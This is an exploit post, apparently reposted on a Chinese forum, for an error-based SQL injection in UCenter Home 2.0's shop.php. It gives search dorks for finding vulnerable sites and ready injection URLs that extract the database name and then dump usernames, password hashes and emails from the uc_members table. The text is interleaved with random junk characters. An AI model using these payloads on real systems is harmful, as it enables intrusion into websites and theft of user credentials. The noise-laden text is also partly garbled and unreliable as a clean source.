" A' E8 G$ k. x5 u' i( a+ |! Q__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
: N1 g" I& ~0 S: D, `( |
4 [1 j' Y0 s7 ^; U# j3 \5 Z 8 }/ q; B$ k. v4 t
( R) h. [, N# o
*/ Author : KnocKout
& [6 r& l5 N: m3 D7 J, M$ r7 o+ \' C4 {0 `
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers % |9 W0 I( d1 M" d: `/ c. _) _4 I
6 c* G0 Q [7 \: X" Q- o& M3 B
*/ Contact: knockoutr@msn.com 8 I3 g- e8 s2 G/ c% n1 G) A$ z; h
. o+ g7 z4 m! N+ R
*/ Cyber-Warrior.org/CWKnocKout
' N) M+ D6 S: r
, n) I) a5 {! V__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
# U# ]) s) t* y$ d- h- Q, `/ t
! S4 \1 p: P0 _! L% z5 F9 K+ ?Script : UCenter Home ) O0 T8 @ H0 [9 C: d& d
1 C0 b6 _# L W6 w* LVersion : 2.0 2 J/ x8 o" k& g" A* k$ N, c
7 @$ u3 R5 q0 WScript HomePage : http://u.discuz.net/ + G# ]. | w. O+ Y- R, } [: u E$ i
, e3 \1 P( B" {7 h8 E
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 N1 ], E a/ Q% U7 y/ I! k1 u6 v7 m( i, i1 [! v9 m
Dork : Powered by UCenter inurl:shop.php?ac=view
, {+ M5 w% ~# ^" O/ O( ^5 O9 h' D/ ?, x5 k6 @* l" Q
Dork 2 : inurl:shop.php?ac=view&shopid= ; x, @' c' X9 }& D
" _3 }+ Q2 ]- D* E/ s$ L__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( i4 _" M+ S- c! H, n- Y& c) X) P; l3 x
Vuln file : Shop.php
) j% K* f8 v' k/ \% l. S3 j
3 k2 k: A- `6 G2 J" Avalue's : (?)ac=view&shopid=
& @% W: ?4 v/ I! n* ^' h# _( v& M9 j9 n8 e0 A( E" m9 L( f- Z2 y
Vulnerable Style : SQL Injection (MySQL Error Based) 1 r3 x1 Y1 X! [/ l' X$ V% K* ^- l* p
" S, @0 }4 o) E2 S, u2 U' N" t
Need Metarials : Hex Conversion
3 p. F9 r9 g t7 L
8 a3 @; _, |, n6 E__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 o# U) d0 U: T( p# c3 W2 g8 \. R' w
Your Need victim Database name.
! Z* I5 t9 n& u: V' H
" V) J! I* U$ l. y- W3 {4 F S$ hfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ! P9 S9 G. f) y) B7 E% s$ o# h- q
6 W' D& K- l# e/ F& l5 f. D.. 7 T- x! W8 w- F+ J
3 o7 f3 _; Z% v; C, hDB : Okey. ) |: ^& z3 X" L, {; Z, p1 v
" P5 P' W7 J% f: @: \7 I- uyour edit DB `[TARGET DB NAME]` " m" [, f8 \! e: P
+ _0 X. f. a7 r% a
Example : 'hiwir1_ucenter' $ c5 n" A4 K5 G- _9 D
) @! G/ ^ R* |% @! G7 @Edit : Okey. & C2 _# y$ }4 Q6 v& ~
! N' L1 V+ d3 h; n6 a# f, h7 yYour use Hex conversion. And edit Your SQL Injection Exploit..
0 V( g! R. F8 y' h4 i: P0 u$ ?% _$ D5 c5 t
7 `2 C$ s1 R- }: _' A" n* w, l
, ], v; y; F) \5 VExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 & }( d' z5 J& m( C. Z4 @
|
发表于 2013-2-27 21:31:31
收藏
支持
反对